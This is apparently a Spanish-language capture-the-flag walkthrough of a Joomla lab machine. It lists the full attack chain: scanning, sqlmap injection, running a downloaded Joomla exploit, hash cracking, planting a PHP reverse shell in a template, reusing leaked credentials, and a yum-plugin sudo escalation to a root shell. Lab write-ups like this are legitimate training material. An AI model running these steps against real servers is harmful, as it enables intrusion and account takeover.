nmap -A -p- -oA output 10.10.126.115 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210508093243.png

nmap -sC -sV -O -p- -oA dailybugle 10.10.126.115

nmap -sU -O -p- -oA dailybugle-udp 10.10.126.115

nikto -h 10.10.10.126.115:80

gobuster dir -k -u http://10.10.126.115/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

Vemos que version de joomla es

curl -s http://10.10.126.115/README.txt | head

Pasted image 20210508093827.png

joomscan --url http://10.10.126.115

Pasted image 20210508094041.png

Parece que tiene un cve esta version de joomla https://www.exploit-db.com/exploits/42033

sqlmap -u "http://10.10.126.115/index.php?option=com\_fields&view=fields&layout=modal&list\[fullordering\]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list\[fullordering\]

Pasted image 20210508094619.png

wget https://raw.githubusercontent.com/stefanlucas/Exploit-Joomla/master/joomblah.py

Pasted image 20210508100143.png

python joomblah.py http://10.10.126.115

Pasted image 20210508100247.png

john jonah_user.hash --wordlist=/usr/share/wordlists/rockyou.txt

Vamos a la pagina de administrador jonah/spiderman123

Pasted image 20210508104729.png

Pasted image 20210508104843.png

Le damos click a index.php

Pasted image 20210508105424.png

Ponemos el codigo que encontramos aqui de reverse shell en index.php

https://github.com/pentestmonkey/php-reverse-shell

nc -lvnp 5555

Le damos click a template preview

Pasted image 20210508105737.png

ls ls home ls /var/www/html

Pasted image 20210508110045.png

cat /var/www/html/configuration.php

Pasted image 20210508110146.png

Encontramos la contrasena de mysql

Pasted image 20210508110906.png

Usamos las credenciales

jjameson/v5uz9r3ZEDzVjNu

Vemos cual es el OS y parece que es redhat

cat /etc/redhat-release

Pasted image 20210508111257.png

[jjameson@dailybugle ~\]$ TF=$(mktemp -d)
[jjameson@dailybugle ~\]$ cat >$TF/x<<EOF
> \[main\]
> plugins=1
> pluginpath=$TF
> pluginconfpath=$TF
> EOF
\[jjameson@dailybugle ~\]$ cat >$TF/y.conf<<EOF
> \[main\]
> enabled=1
> EOF
\[jjameson@dailybugle ~\]$ cat >$TF/y.py<<EOF
> import os
> import yum
> from yum.plugins import PluginYumExit, TYPE\_CORE, TYPE\_INTERACTIVE
> requires\_api\_version='2.1'
> def init\_hook(conduit):
>   os.execl('/bin/sh','/bin/sh')
> EOF
\[jjameson@dailybugle ~\]$ sudo yum -c $TF/x --enableplugin=y
Loaded plugins: y
No plugin match for: y

Pasted image 20210508112641.png

boxes

copyright©2022 Cu3rv0x all rights reserved